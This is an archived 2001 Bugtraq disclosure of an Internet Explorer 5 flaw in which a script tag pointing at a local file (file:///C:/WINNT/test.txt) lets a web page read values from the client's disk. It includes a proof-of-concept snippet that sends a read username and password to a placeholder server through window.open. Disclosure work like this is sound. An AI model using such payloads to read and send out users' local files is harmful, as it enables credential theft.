I noticed that my previous mail was strangly reformatted. I guess Outlook tried to outsmart me again. The script tag should be <script src="file:///C:/WINNT/test.txt"></script> -----Original Message----- From: Stefaan Deman [mailto:Stefaan.Demanat_private] Sent: Wednesday, June 06, 2001 10:27 AM To: 'bugtraqat_private' Subject: security bug Internet Explorer 5 There is a security bug in the Internet Explorer 5 (I haven't tested it on other browsers). It is possible to read some textfiles (others than cookies) from the client's hard disk. If there is for example in the directory 'C:\WINNT' a textfile 'test.txt' with content: us="stefaan" passwd="mypasswd" then it is possible to read this file in an HTML page with the tag: <script src=" <file:///C:/WINNT/test.txt> file:///C:/WINNT/test.txt"></script> The HTML page will consider the file as a script and us and passwd will be considered as variables in the previous example. It is then possible to use this information or send this (possible critical) information back to the webserver with for example <script> //alert(passwd) window.open(" <http://myurl/myasppage.asp?us> http://myurl/myasppage.asp?us=" + escape(us) + ";passwd=" + escape(passwd), "blabla") </script> This is a security bug, it should be impossible to read any file on the client's file system. Of course the file should have a correct JavaScript or VBscript syntax and the filename should be known. However, it is easy to image how this security hole can be misused. This bug isn't as severe as the one posted by Guninski ( <http://www.guninski.com/scractx.html> http://www.guninski.com/scractx.html). The difference between this bug and the one of Guninski is that this security hole doesn't make use of Active X components. Stefaan Deman
This archive was generated by hypermail 2b30 : Fri Jun 08 2001 - 08:23:34 PDT